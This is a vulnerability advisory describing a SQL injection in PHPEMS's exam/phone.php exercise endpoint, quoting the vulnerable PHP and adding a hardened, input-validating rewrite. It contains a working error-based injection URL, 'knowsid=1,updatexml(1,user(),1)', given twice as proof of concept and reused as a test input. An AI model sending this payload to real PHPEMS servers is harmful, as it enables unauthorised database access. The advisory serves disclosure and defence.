### Summary: A SQL injection vulnerability in PHPEMS

### Details:

8. SQL injection in PHPEMS

The injectable code is in the `exercise()` function of `/app/exam/phone.php`, around line 239:

```php
$numbers[$p['questid']] = intval(ceil($this->exam->getQuestionNumberByQuestypeAndKnowsid($p['questid'],$knowids)));
```

Here the second argument to `getQuestionNumberByQuestypeAndKnowsid`, `$knowids`, is fully user-controlled. Inside the function:

```php
public function getQuestionNumberByQuestypeAndKnowsid($questype,$knowsid)
{
    if(!$knowsid)$knowsid = '0';
    // $knowsid is interpolated directly into the IN (...) clause of both queries
    $data = array("count(*) AS number",array('questions','quest2knows'),array("questions.questiontype = '{$questype}'","questions.questionparent = 0","questions.questionstatus = 1","questions.questionid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 0"),false,false,false);
    $sql = $this->sql->makeSelect($data);
    $r = $this->db->fetch($sql);
    $data = array("sum(qrnumber) AS number",array('questionrows','quest2knows'),array("questionrows.qrtype = '{$questype}'","questionrows.qrstatus = 1","questionrows.qrid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 1"),false,false,false);
    $sql = $this->sql->makeSelect($data);
    $m = $this->db->fetch($sql);
    return $r['number']+$m['number'];
}
```

The value is concatenated into the SQL statement without any filtering, which produces a SQL injection vulnerability.

Verification steps:

Register a user and log in, then visit `localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1)` to confirm.

Verified.

### Proof of vulnerability:

Register a user and log in, then visit `localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1)` to confirm.

[![fff.png](https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png)](https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png)

Verified.
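As an added defensive example (not PHPEMS's own code), the following shows how the `quest2knows.qkknowsid IN ({$knowsid})` clause from the report could be built safely: the id list is whitelisted to plain integers before interpolation, and the question type is bound as a PDO parameter instead of being placed in the string. `sanitizeIdList` and `buildCountQuery` are hypothetical helpers; the table and column names follow the first query in the report.

```php
<?php
// Added example, not PHPEMS code. Validate a comma-separated list of
// knowledge-point ids before it is placed in an IN (...) clause.
// Returns the normalised list, or null if any element is not a decimal integer.
function sanitizeIdList(string $raw): ?string
{
    $ids = array();
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        // Only digits are accepted; quotes, parentheses and function calls
        // such as the updatexml(...) expression in the report are rejected.
        if (!preg_match('/^\d+$/', $part)) {
            return null;
        }
        $ids[] = (int) $part;
    }
    return implode(',', array_unique($ids));
}

// Hypothetical hardened variant of the count query built in
// getQuestionNumberByQuestypeAndKnowsid(). An empty list becomes '0',
// mirroring the original `if(!$knowsid)$knowsid = '0';`.
function buildCountQuery(PDO $db, string $questype, string $knowsid): PDOStatement
{
    $list = sanitizeIdList($knowsid === '' ? '0' : $knowsid);
    if ($list === null) {
        throw new InvalidArgumentException('knowsid must be a comma-separated list of integers');
    }
    $sql = "SELECT count(*) AS number FROM questions, quest2knows"
         . " WHERE questions.questiontype = :questype"
         . " AND questions.questionparent = 0 AND questions.questionstatus = 1"
         . " AND questions.questionid = quest2knows.qkquestionid"
         . " AND quest2knows.qkknowsid IN ({$list})" // digits and commas only
         . " AND quest2knows.qktype = 0";
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':questype', $questype, PDO::PARAM_STR);
    return $stmt;
}

// Constructed inputs: a normal list and the value from the report.
// The first is accepted and normalised; the second returns null and
// would make buildCountQuery() throw before any SQL is assembled.
$accepted = sanitizeIdList('1, 2,2,3');
$rejected = sanitizeIdList('1,updatexml(1,user(),1)');
```

The request handler can turn the `InvalidArgumentException` into a 400 response, and logging such rejections gives a simple detection signal for injection attempts against this endpoint.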